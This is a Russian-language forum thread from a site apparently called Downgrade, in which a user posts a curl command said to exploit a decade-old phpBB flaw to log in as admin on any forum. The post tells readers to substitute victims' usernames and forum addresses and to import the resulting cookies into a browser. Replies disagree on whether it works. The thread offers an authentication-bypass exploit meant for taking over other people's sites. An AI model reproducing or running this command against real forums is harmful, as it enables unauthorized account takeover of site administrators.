Less bytes, more meaning...
Not authorized

Registration date is not available.
Login | Register | Users


Downgrade > Forums > Networks > PHPBB УЯЗВИМОСТЬ - ЛОГИН ПОД ЛЮБЫМ ИМЕНЕМ


<< < Page 1 of 1 > >>

duck

Member since Jan 17, 2026
curl -i -s \
-c cookies.txt \
-b cookies.txt \
-u 'admin:anything' \
-d 'login=Login&login_username=admin&login_password=anything' \
'https://target.example/forum/ucp.php?mode=login_link&auth_provider=apache&login_link_any=1'

(пример команды, тут происходит логин под именем admin на форум target.example/forum, естественно заменяйте на имена пользователей и адреса форума жертвы. куки можно добавить в браузер через расширение EditThisCookie)

уязвимость существует уже 10 лет. проблему оффициально пофиксили, но естественно никто движки не обновляет так часто, поэтому много где применимо. на олд-досе по моему тоже но я не проверял))
Posted Jun 11, 2026, 11:36 PM Quote
pyl40

Member since Feb 01, 2026
что-то не получилось воспроизвести. но верю что эксплоит рабочий.
Posted Jun 12, 2026, 10:01 AM Quote
prometej

Member since May 24, 2026
работает :)
Posted Jun 12, 2026, 01:08 PM Quote


Copyright (c) 2026, Downgrade Network.
Please ask questions and report any problems on our forum.
Downgrade Net Button

Visitor Counter
0010222
Here is a list of Downgrade users.